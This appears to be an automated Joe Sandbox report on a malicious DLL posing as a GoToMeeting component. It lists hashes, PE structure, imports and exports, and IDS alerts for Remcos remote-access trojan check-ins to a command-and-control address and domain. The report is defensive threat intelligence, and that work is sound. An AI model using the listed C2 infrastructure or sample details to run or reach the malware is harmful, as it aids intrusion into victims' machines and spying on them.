https://www.gotomeeting.comhttps://www.gotowebinar.comhttps://www.gototraining.comhwId | memory dumps of loaddll32.exe, regsvr32.exe, rundll32.exe | false | - | unknown
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious):
193.233.18.18 | goatratedman.com | Russian Federation | 8749 | REDCOM-ASRedcomKhabarovskRussiaRU | true
                                Joe Sandbox version:41.0.0 Charoite
                                Analysis ID:1536945
                                Start date and time:2024-10-18 12:13:19 +02:00
                                Joe Sandbox product:CloudBasic
                                Overall analysis duration:0h 9m 22s
                                Hypervisor based Inspection enabled:false
                                Report type:full
                                Cookbook file name:default.jbs
                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:26
                                Number of new started drivers analysed:0
                                Number of existing processes analysed:0
                                Number of existing drivers analysed:0
                                Number of injected processes analysed:0
                                Technologies:
                                • HCA enabled
                                • EGA enabled
                                • AMSI enabled
                                Analysis Mode:default
                                Analysis stop reason:Timeout
                                Sample name:7P7cuKWTfN.dll
                                renamed because original name is a hash value
                                Original Sample Name:8e521953f01b56f163a5d7ca777cdbef86f1d9291bf994d3ba35cb0e89729da0.dll
                                Detection:MAL
                                Classification:mal100.rans.troj.spyw.expl.evad.winDLL@40/1@2/1
                                EGA Information:
                                • Successful, ratio: 100%
                                HCA Information:
                                • Successful, ratio: 99%
                                • Number of executed functions: 40
                                • Number of non-executed functions: 363
                                Cookbook Comments:
                                • Found application associated with file extension: .dll
                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
                                • Report size exceeded maximum capacity and may have missing behavior information.
                                • VT rate limit hit for: 7P7cuKWTfN.dll
Time | Type | Description
06:15:37 | API Interceptor | 3517504x Sleep call for process: rundll32.exe modified
                                No context
                                No context
Similar samples sharing the match REDCOM-ASRedcomKhabarovskRussiaRU (Associated Sample Name / URL | Detection | Threat Name | Context):
yQjt1fG5M5.exe | malicious | Unknown | 193.233.22.45
yQjt1fG5M5.exe | malicious | Unknown | 193.233.22.45
botnt.arm7.elf | malicious | Unknown | 95.85.78.2
botnt.arm.elf | malicious | Unknown | 95.85.78.19
pWf4oPGBv2.elf | malicious | Mirai | 212.19.0.216
qCgtVyWfS6.elf | malicious | Mirai | 212.19.0.214
OVaDIUarkm.exe | malicious | Amadey, Healer AV Disabler, RedLine | 193.233.20.14
ekevL8v2mi.exe | malicious | Amadey, Healer AV Disabler, RedLine | 193.233.20.14
vJSyCK4is2.elf | malicious | Mirai | 212.19.25.242
flB6ygLzMc.elf | malicious | Mirai | 212.19.0.220
                                No context
                                No context
                                Process:C:\Windows\SysWOW64\rundll32.exe
                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):15798272
                                Entropy (8bit):6.844423960721825
                                Encrypted:false
                                SSDEEP:196608:i0ivGTAslgbSYBsnBho/wnBvq+4rMOblxz6qYFS1qY2aubxi58/EUxFFVsmN:izvfaEog+4rdbUTFVRN
                                MD5:6D5A39FFB948CE7FF8744E302201F711
                                SHA1:AF806FEEB69690F4963EAA146C1DEBB67A45895D
                                SHA-256:8E521953F01B56F163A5D7CA777CDBEF86F1D9291BF994D3BA35CB0E89729DA0
                                SHA-512:BC2869463865C220800279CD4973633DAEDA05484FCF172AC4C5750EB7E215B88DFFA195E51AAFDF4193A5F5D182859966D70D1E1FCD3B6BD6A3F5D0663F0B00
                                Malicious:true
                                Antivirus:
                                • Antivirus: Avira, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 47%
                                Preview:MZ......................@...................................X...........!..L.!This program cannot be run in DOS mode....$...........X.s.X.s.X.s...[.s.F...P.s.]...[.s.n.x.Z.s...y...s...y.U.s...x.u.s.....Q.s...,.L.s..<....s.Q...I.s.].,...s..<....s..<..q.s.X.s...s.Q....s.X.r.-.s..<..i.s.Q...H.s.Q.....s.Q..Y.s.F..Y.s.Q..Y.s.RichX.s.........PE..L......N...........!.....&....2......&......@.......................................h....@......................... .......@............x........... ..x............Z......................Dy.......................@.......m.......................text.... .......................... ..`.orpc........0.......".............. ..`.rdata....#..@...~#..*..............@..@.data...............................@....tls.........p......................@....rsrc....x.......z..................@..@........................................................................................................................................................................
                                File type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Entropy (8bit):6.844423960721825
                                TrID:
                                • Win32 Dynamic Link Library (generic) (1002004/3) 95.65%
                                • Win32 EXE PECompact compressed (generic) (41571/9) 3.97%
                                • Generic Win/DOS Executable (2004/3) 0.19%
                                • DOS Executable Generic (2002/1) 0.19%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:7P7cuKWTfN.dll
                                File size:15'798'272 bytes
                                MD5:6d5a39ffb948ce7ff8744e302201f711
                                SHA1:af806feeb69690f4963eaa146c1debb67a45895d
                                SHA256:8e521953f01b56f163a5d7ca777cdbef86f1d9291bf994d3ba35cb0e89729da0
                                SHA512:bc2869463865c220800279cd4973633daeda05484fcf172ac4c5750eb7e215b88dffa195e51aafdf4193a5f5d182859966d70d1e1fcd3b6bd6a3f5d0663f0b00
                                SSDEEP:196608:i0ivGTAslgbSYBsnBho/wnBvq+4rMOblxz6qYFS1qY2aubxi58/EUxFFVsmN:izvfaEog+4rdbUTFVRN
                                TLSH:F1F6BF53BBD788BCE2BA16F06838A12A95B9FE700734C1DF7594590DAB31EC2D532352
                                File Content Preview:MZ......................@...................................X...........!..L.!This program cannot be run in DOS mode....$...........X.s.X.s.X.s.....[.s.F...P.s.]...[.s.n.x.Z.s...y...s...y.U.s...x.u.s.....Q.s...,.L.s..<....s.Q...I.s.].,...s..<....s..<..q.s
                                Icon Hash:17339671d696130e
                                Entrypoint:0x102682d4
                                Entrypoint Section:.text
                                Digitally signed:true
                                Imagebase:0x10000000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
                                Time Stamp:0x4EC192BA [Mon Nov 14 22:14:18 2011 UTC]
                                TLS Callbacks:0x108c4ac0
                                CLR (.Net) Version:
                                OS Version Major:5
                                OS Version Minor:0
                                File Version Major:5
                                File Version Minor:0
                                Subsystem Version Major:5
                                Subsystem Version Minor:0
                                Import Hash:256f838536a40e4b7c75c6cc601f59e9
                                Signature Valid:
                                Signature Issuer:
                                Signature Validation Error:
                                Error Number:
                                Not Before, Not After
                                  Subject Chain
                                    Version:
                                    Thumbprint MD5:
                                    Thumbprint SHA-1:
                                    Thumbprint SHA-256:
                                    Serial:
                                    Instruction
                                    mov edi, edi
                                    push ebp
                                    mov ebp, esp
                                    cmp dword ptr [ebp+0Ch], 01h
                                    call 00007F7758B584E6h
                                    add byte ptr [eax], al
                                    push dword ptr [ebp+08h]
                                    mov ecx, dword ptr [ebp+10h]
                                    mov edx, dword ptr [ebp+0Ch]
                                    call 00007F7758DB38E1h
                                    pop ecx
                                    pop ebp
                                    retn 000Ch
                                    mov edi, edi
                                    push ebp
                                    mov ebp, esp
                                    mov eax, dword ptr [ebp+08h]
                                    mov edx, eax
                                    mov cx, word ptr [eax]
                                    inc eax
                                    inc eax
                                    test cx, cx
                                    jne 00007F7758DB39E8h
                                    mov cx, word ptr [ebp+0Ch]
                                    dec eax
                                    dec eax
                                    cmp eax, edx
                                    je 00007F7758DB39F7h
                                    cmp word ptr [eax], cx
                                    jne 00007F7758DB39E7h
                                    cmp word ptr [eax], cx
                                    je 00007F7758DB39F4h
                                    xor eax, eax
                                    pop ebp
                                    ret
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    int3
                                    push ebp
                                    mov ebp, esp
                                    push edi
                                    push esi
                                    mov esi, dword ptr [ebp+0Ch]
                                    mov ecx, dword ptr [ebp+10h]
                                    mov edi, dword ptr [ebp+08h]
                                    mov eax, ecx
                                    mov edx, ecx
                                    add eax, esi
                                    cmp edi, esi
                                    jbe 00007F7758DB39FAh
                                    cmp edi, eax
                                    jc 00007F7758DB3B9Ah
                                    cmp ecx, 00000100h
                                    jc 00007F7758DB3A11h
                                    cmp dword ptr [10EC5BDCh], 00000000h
                                    je 00007F7758DB3A08h
                                    push edi
                                    push esi
                                    and edi, 0Fh
                                    and esi, 0Fh
                                    cmp edi, esi
                                    pop esi
                                    pop edi
                                    jne 00007F7758DB39FAh
                                    pop esi
                                    pop edi
                                    pop ebp
                                    jmp 00007F7758DBE39Ah
                                    test edi, 00000003h
                                    jne 00007F7758DB3A07h
                                    shr ecx, 02h
                                    and edx, 03h
                                    cmp ecx, 08h
                                    jc 00007F7758DB3A1Ch
                                    rep movsd
                                    jmp dword ptr [102684A4h+edx*4]
                                    nop
                                    mov eax, edi
                                    mov edx, 00000003h
                                    Programming Language:
                                    • [C++] VS2008 build 21022
                                    • [C++] VS2003 (.NET) build 3077
                                    • [C++] VS98 (6.0) SP6 build 8804
                                    • [ C ] VS98 (6.0) build 8168
                                    • [C++] VS98 (6.0) build 8168
                                    • [C++] VS2003 (.NET) SP1 build 6030
                                    • [ C ] VS2003 (.NET) SP1 build 6030
                                    • [C++] VS2005 build 50727
                                    • [ C ] VS2003 (.NET) build 3077
                                    • [ASM] VS2005 build 50727
                                    • [ C ] VS2005 build 50727
                                    • [ASM] VS2008 SP1 build 30729
                                    • [IMP] VS2005 build 50727
                                    • [C++] VS2008 SP1 build 30729
                                    • [ C ] VS2008 SP1 build 30729
                                    • [EXP] VS2008 SP1 build 30729
                                    • [RES] VS2008 build 21022
                                    • [LNK] VS2008 SP1 build 30729
Data directories (Name | Virtual Address | Virtual Size | Is in Section):
IMAGE_DIRECTORY_ENTRY_EXPORT | 0xe1ba20 | 0x2ef | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xe18b40 | 0x1f4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xec8000 | 0xc7810 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xef2000 | 0x1578 | .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xed0000 | 0x81884 | .rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xbe5ac0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_TLS | 0xdc7944 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_IAT | 0xbe4000 | 0x8cc | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0xe16d8c | 0xc0 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | -
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | -
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xbe2000 | 0xbe1e00 | 960883c097e737a959b44d0f56c4ddf9 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.orpc | 0xbe3000 | 0x1000 | 0x800 | 9b14263b8faf3c96646355f3c8dfd420 | False | 0.27490234375 | data | 5.138237723287718 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0xbe4000 | 0x238000 | 0x237e00 | b216362d81cbc191bb555df2bba83da5 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xe1c000 | 0xab000 | 0x2ec00 | d9c87173298748538f8d712472c746b4 | False | 0.2606951871657754 | data | 5.61955411378293 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xec7000 | 0x1000 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xec8000 | 0xc7810 | 0xc7a00 | 5231603992ad2ad23fbe9c02af4dcc0d | False | 0.6501264578115216 | data | 7.478090400985154 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
REGISTRY | 0xec8484 | 0xfc | ASCII text, with CRLF line terminators | English | United States | 0.7619047619047619
RT_BITMAP | 0xec8580 | 0x78a36 | PC bitmap, Windows 3.x format, 62726 x 2 x 37, image size 494286, cbSize 494134, bits offset 54 | | | 0.7526419958958501
RT_ICON | 0xf40fb8 | 0xb118 | PC bitmap, Windows 3.x format, 5924 x 2 x 38, image size 45913, cbSize 45336, bits offset 54 | | | 0.49649285336156695
RT_ICON | 0xf4c0d0 | 0x7ce8 | PC bitmap, Windows 3.x format, 4804 x 2 x 38, image size 32060, cbSize 31976, bits offset 54 | | | 0.4609394545909432
RT_ICON | 0xf53db8 | 0x4b44 | PC bitmap, Windows 3.x format, 3286 x 2 x 44, image size 20056, cbSize 19268, bits offset 54 | | | 0.5784720780568818
RT_ICON | 0xf588fc | 0x300db | PC bitmap, Windows 3.x format, 25213 x 2 x 41, image size 197229, cbSize 196827, bits offset 54 | | | 0.47846078027912836
RT_ICON | 0xf889d8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States | 0.47297297297297297
RT_ICON | 0xf88b00 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | English | United States | 0.7355491329479769
RT_ICON | 0xf89068 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 672 | English | United States | 0.7327188940092166
RT_ICON | 0xf89730 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | English | United States | 0.7522563176895307
RT_ICON | 0xf89fd8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2688 | English | United States | 0.6551172707889126
RT_ICON | 0xf8ae80 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.6179078014184397
RT_ICON | 0xf8b2e8 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.6098360655737705
RT_ICON | 0xf8bc70 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.551829268292683
RT_ICON | 0xf8cd18 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.520643153526971
RT_STRING | 0xf8f2c0 | 0x30 | data | English | United States | 0.6458333333333334
RT_GROUP_ICON | 0xf8f2f0 | 0x84 | data | English | United States | 0.6590909090909091
RT_VERSION | 0xf8f374 | 0x340 | data | English | United States | 0.4483173076923077
RT_MANIFEST | 0xf8f6b4 | 0x15a | ASCII text, with CRLF line terminators | English | United States | 0.5491329479768786
DLL | Import
RPCRT4.dll | NdrDllGetClassObject, RpcStringFreeW, UuidToStringW, NdrOleAllocate, NdrOleFree, IUnknown_QueryInterface_Proxy, IUnknown_AddRef_Proxy, IUnknown_Release_Proxy, CStdStubBuffer_QueryInterface, CStdStubBuffer_AddRef, CStdStubBuffer_Connect, CStdStubBuffer_Disconnect, CStdStubBuffer_Invoke, CStdStubBuffer_IsIIDSupported, CStdStubBuffer_CountRefs, CStdStubBuffer_DebugServerQueryInterface, CStdStubBuffer_DebugServerRelease, NdrCStdStubBuffer_Release, UuidCreate
NETAPI32.dll | Netbios
PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, EnumProcessModules, GetModuleFileNameExW, GetModuleInformation
SHLWAPI.dll | PathRemoveExtensionW, PathStripPathW, StrFormatByteSizeW, StrChrW
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
MSACM32.dll | acmStreamOpen, acmStreamConvert, acmStreamUnprepareHeader, acmStreamPrepareHeader
POWRPROF.dll | CallNtPowerInformation
WININET.dll | InternetReadFileExA, HttpOpenRequestW, InternetSetStatusCallbackW, HttpQueryInfoW, InternetSetOptionW, InternetOpenW, HttpSendRequestExW, InternetQueryOptionW, InternetCloseHandle, InternetConnectW, InternetErrorDlg, HttpEndRequestW
KERNEL32.dll | CopyFileW, GetFileAttributesW, GetDiskFreeSpaceExW, GetTempFileNameW, FindFirstFileW, MoveFileW, GetSystemWindowsDirectoryW, GetLocaleInfoW, GetSystemInfo, GlobalMemoryStatusEx, lstrlenA, LocalAlloc, lstrcmpiW, ReleaseMutex, CreateMutexW, ResumeThread, GetThreadContext, SuspendThread, InterlockedIncrement, SetThreadPriority, GetThreadPriority, TerminateThread, CreateProcessW, TerminateProcess, GetExitCodeProcess, GetShortPathNameW, CompareFileTime, CreateDirectoryW, RemoveDirectoryW, GetSystemDirectoryW, GetCurrentDirectoryW, SetCurrentDirectoryW, GetLocalTime, InitializeCriticalSection, DeleteCriticalSection, TryEnterCriticalSection, EnterCriticalSection, LeaveCriticalSection, WaitForMultipleObjects, GetProcessTimes, GetTickCount, GetTimeFormatW, GetDateFormatW, GetTimeZoneInformation, QueryPerformanceCounter, QueryPerformanceFrequency, ResetEvent, OpenEventW, CreateEventW, FindVolumeClose, FindNextVolumeW, QueryDosDeviceW, FindFirstVolumeW, FindNextFileW, DeleteFileW, GetUserDefaultLCID, GetUserDefaultUILanguage, EnumResourceLanguagesW, OpenThread, GetThreadTimes, DisableThreadLibraryCalls, InterlockedDecrement, lstrlenW, SizeofResource, LoadResource, FindResourceW, OpenMutexW, SetEnvironmentVariableW, GetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathA, CreateDirectoryA, SetLastError, SetWaitableTimer, CreateWaitableTimerW, WritePrivateProfileStringW, GetPrivateProfileStringW, VirtualFree, VirtualAlloc, GlobalLock, GlobalFree, GlobalUnlock, GlobalAlloc, FlushInstructionCache, lstrcmpW, MulDiv, LockResource, GetVersionExA, ExpandEnvironmentStringsW, GetFileTime, ExitProcess, Thread32Next, Thread32First, CreateToolhelp32Snapshot, Process32NextW, Process32FirstW, SetThreadExecutionState, FlushFileBuffers, SetEndOfFile, SetFilePointer, WriteFile, ReadFile, FindClose, OpenProcess, GetCurrentThread, InterlockedExchange, MultiByteToWideChar, WideCharToMultiByte, GetSystemTime, SystemTimeToFileTime, FileTimeToSystemTime, TlsFree, HeapFree, HeapAlloc, HeapDestroy, HeapCreate, GetCurrentThreadId, GetTempPathW, CreateFileW, GetCurrentProcessId, GetFileSize, CreateFileMappingW, MapViewOfFile, SetEvent, WaitForSingleObject, UnmapViewOfFile, CloseHandle, GetSystemTimeAsFileTime, CreateEventA, LoadLibraryExW, OutputDebugStringW, LocalFree, GetLastError, SetUnhandledExceptionFilter, GetVersionExW, LoadLibraryW, Sleep, GetCurrentProcess, GetModuleFileNameW, FormatMessageW, IsBadReadPtr, GetModuleHandleW, GetProcAddress, TlsAlloc, TlsSetValue, TlsGetValue, RaiseException, FreeLibrary, FileTimeToLocalFileTime, GetDriveTypeA, ReadConsoleInputA, SetConsoleMode, LCMapStringA, InitializeCriticalSectionAndSpinCount, SetConsoleCtrlHandler, CompareStringW, GetDateFormatA, GetTimeFormatA, HeapReAlloc, GetFullPathNameA, PeekNamedPipe, GetCurrentDirectoryA, FoldStringW, GetConsoleMode, GetConsoleCP, HeapSize, GetModuleHandleA, LCMapStringW, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsA, GetModuleFileNameA, GetStartupInfoA, GetFileType, GetStdHandle, SetHandleCount, RtlUnwind, CreateThread, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, EnumSystemLocalesA, IsValidLocale, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA, GetProcessHeap, CompareStringA, SetEnvironmentVariableA, InterlockedCompareExchange, IsProcessorFeaturePresent, GetCommandLineW, ReleaseSemaphore, CreateSemaphoreW, GetVolumeInformationW, DuplicateHandle, GetVersion, ExitThread, IsDebuggerPresent, UnhandledExceptionFilter, GetCommandLineA, GetPrivateProfileSectionNamesW, FindFirstFileA, GlobalMemoryStatus, LoadLibraryA, GetSystemDefaultLCID, GetPrivateProfileSectionW, CancelWaitableTimer, DeleteFileA, GetFileAttributesExA, SetThreadAffinityMask, GetProcessAffinityMask, CreateWaitableTimerA, OutputDebugStringA, AllocConsole, FreeConsole, FormatMessageA, CreateSemaphoreA, SetPriorityClass, CreateMutexA, GetFileInformationByHandle, FlushConsoleInputBuffer
GDI32.dll | CreateDCW, GetRegionData, ExtTextOutW, OffsetRgn, GetRgnBox, EqualRgn, CreateBitmap, SetROP2, FillRgn, CreateRectRgnIndirect, DPtoLP, Ellipse, RestoreDC, Polyline, SaveDC, CreatePen, SetPolyFillMode, GetSystemPaletteEntries, CreatePalette, GetPaletteEntries, GetDIBColorTable, SetDIBColorTable, CreateDIBSection, GetDCOrgEx, Polygon, FrameRgn, PaintRgn, CreatePolygonRgn, CreateRoundRectRgn, SetStretchBltMode, StretchBlt, GetDIBits, CreateDIBitmap, SetDIBits, SelectClipRgn, ExcludeClipRect, SetMapMode, SetWindowExtEx, SetViewportExtEx, SetWindowOrgEx, SetViewportOrgEx, LineTo, MoveToEx, GetClipBox, SetPixelV, GetTextMetricsW, GetTextExtentPoint32W, SetBkColor, CreateRectRgn, SetRectRgn, CombineRgn, GetBitmapBits, SetTextColor, TextOutW, GetBkMode, GetTextColor, CreateFontW, CreateFontIndirectW, GetStockObject, GetObjectW, GetDeviceCaps, BitBlt, CreateSolidBrush, GetPixel, SetBkMode, SetBrushOrgEx, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, CreatePatternBrush, DeleteDC, DeleteObject, SetPixel
COMDLG32.dll | GetOpenFileNameW, CommDlgExtendedError, ChooseColorW, GetSaveFileNameW
ole32.dll | CoGetCallContext, CoRevokeClassObject, CoRegisterClassObject, CoInitializeSecurity, CoGetObject, CoDisconnectObject, CoGetCurrentProcess, CoCreateFreeThreadedMarshaler, CoTaskMemFree, CoTaskMemAlloc, CoFreeUnusedLibraries, StringFromGUID2, CoCreateInstance, CoCreateGuid, CLSIDFromProgID, OleLockRunning, CoGetClassObject, CLSIDFromString, CreateStreamOnHGlobal, CoInitialize, CoSetProxyBlanket, OleUninitialize, CoUninitialize, CoInitializeEx, CoTaskMemRealloc, OleInitialize, CoRegisterPSClsid, StringFromCLSID
OLEAUT32.dll | SystemTimeToVariantTime, UnRegisterTypeLib, LoadTypeLib, SysAllocString, SysFreeString, SysStringLen, RegisterTypeLib, VarUI4FromStr, LPSAFEARRAY_UserSize, LPSAFEARRAY_UserMarshal, LPSAFEARRAY_UserUnmarshal, OleCreateFontIndirect, LoadRegTypeLib, OleLoadPicture, LPSAFEARRAY_UserFree, SysStringByteLen, SysAllocStringLen, BSTR_UserUnmarshal, DispCallFunc, BSTR_UserFree, SafeArrayGetElement, SafeArrayDestroy, SafeArrayPutElement, SafeArrayCreate, SysAllocStringByteLen, VariantCopy, BSTR_UserSize, OleCreatePropertyFrame, VariantInit, VarBstrCat, VarBstrCmp, OleLoadPicturePath, BSTR_UserMarshal, VariantClear, VariantChangeType
Secur32.dll | GetUserNameExW, InitSecurityInterfaceA
WTSAPI32.dll | WTSQuerySessionInformationW, WTSFreeMemory
COMCTL32.dll | InitCommonControlsEx
USERENV.dll | DestroyEnvironmentBlock, CreateEnvironmentBlock
WINMM.dll | mixerGetDevCapsA, mixerGetLineControlsA, mixerGetLineInfoA, waveInGetDevCapsA, waveOutGetDevCapsA, mixerGetControlDetailsA, timeSetEvent, timeGetTime, timeKillEvent, mmioOpenA, timeEndPeriod, timeBeginPeriod, waveInUnprepareHeader, waveInReset, waveInPrepareHeader, waveInAddBuffer, waveInStart, waveInStop, waveInGetErrorTextW, waveInGetPosition, mmioOpenW, mmioDescend, mmioAscend, waveOutUnprepareHeader, waveOutReset, waveOutPrepareHeader, mmioRead, waveOutPause, waveOutWrite, mmioClose, mixerGetNumDevs, mixerOpen, mixerSetControlDetails, mixerGetLineInfoW, mixerGetDevCapsW, waveInOpen, waveOutOpen, waveOutGetPosition, waveOutClose, mixerGetID, waveInGetID, waveOutGetID, mixerGetLineControlsW, mixerGetControlDetailsW, waveOutGetNumDevs, waveInGetNumDevs, waveInGetDevCapsW, waveOutGetDevCapsW, mixerClose, waveOutGetVolume, waveOutSetVolume, waveInClose
AVIFIL32.dll | AVIStreamWrite, AVIFileInit, AVIFileExit, AVIFileRelease, AVIFileCreateStreamA, AVIStreamRead, AVIStreamTimeToSample, AVIStreamSampleToTime, AVIStreamFindSample, AVIStreamLength, AVIStreamReadFormat, AVIStreamRelease, AVIStreamSetFormat, AVIFileOpenA, AVIFileGetStream, AVIFileInfoA
MSVFW32.dll | ICOpen, ICDecompress, ICSendMessage, ICClose
AVICAP32.dll | capGetDriverDescriptionA, capCreateCaptureWindowA
d3d9.dll | Direct3DCreate9
WSOCK32.dll | recvfrom, htonl, getsockname, gethostname, getsockopt, inet_ntoa, select, WSACleanup, closesocket, shutdown, WSAGetLastError, recv, WSASetLastError, send, inet_addr, ntohs, sendto, htons, ioctlsocket, WSAStartup, gethostbyname, ntohl, socket, setsockopt, accept, listen, bind, connect, getpeername, __WSAFDIsSet
WS2_32.dll | WSAWaitForMultipleEvents, WSAResetEvent, WSAEnumNetworkEvents, WSACreateEvent, WSACloseEvent, WSASetEvent, WSAEventSelect, getnameinfo, WSAIoctl
Name | Ordinal | Address
DllCanUnloadNow | 5 | 0x1000bf07
DllGetClassObject | 6 | 0x1000bef0
DllRegisterServer | 7 | 0x1000bf0c
DllUnregisterServer | 8 | 0x1000bf1e
g2mchat_winmain | 9 | 0x1000c09e
g2mcomm_winmain | 10 | 0x1000bfc6
g2mfeedback_winmain | 11 | 0x1000c0ef
g2mhost_winmain | 12 | 0x1000c068
g2minstaller_winmain | 13 | 0x1000c140
g2minsthigh_winmain | 14 | 0x1000c140
g2mlauncher_winmain | 15 | 0x1000bffc
g2mmatchmaking_winmain | 16 | 0x1000c017
g2mmaterials_winmain | 1 | 0x1000c10a
g2mpolling_winmain | 17 | 0x1000c0b9
g2mqanda_winmain | 18 | 0x1000c0d4
g2mrecorder_winmain | 19 | 0x1000c15b
g2msessioncontrol_winmain | 20 | 0x1000c032
g2mstart_winmain | 21 | 0x1000bfe1
g2mtesting_winmain | 2 | 0x1000c125
g2mtranscoder_winmain | 3 | 0x1000c191
g2mui_winmain | 22 | 0x1000c04d
g2muninstall_winmain | 23 | 0x1000c140
g2mvideoconference_winmain | 4 | 0x1000c176
g2mview_winmain | 24 | 0x1000c083
Language of compilation system | Country where language is spoken | Map
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-18T12:15:02.559383+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49735 | 193.233.18.18 | 4050 | TCP
2024-10-18T12:15:11.097889+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49737 | 193.233.18.18 | 5140 | TCP
2024-10-18T12:15:20.607977+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49774 | 193.233.18.18 | 4050 | TCP
2024-10-18T12:15:29.097370+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49817 | 193.233.18.18 | 5140 | TCP
2024-10-18T12:15:38.607134+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49858 | 193.233.18.18 | 4050 | TCP
2024-10-18T12:15:47.106960+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49907 | 193.233.18.18 | 5140 | TCP
2024-10-18T12:15:56.591358+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 49960 | 193.233.18.18 | 4050 | TCP
2024-10-18T12:16:05.072729+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 50009 | 193.233.18.18 | 5140 | TCP
2024-10-18T12:16:14.593568+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 50010 | 193.233.18.18 | 4050 | TCP
2024-10-18T12:16:23.135021+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 50011 | 193.233.18.18 | 5140 | TCP
2024-10-18T12:16:32.623415+0200 | 2032776 | ET MALWARE Remcos 3.x Unencrypted Checkin | 1 | 192.168.2.4 | 50012 | 193.233.18.18 | 4050 | TCP
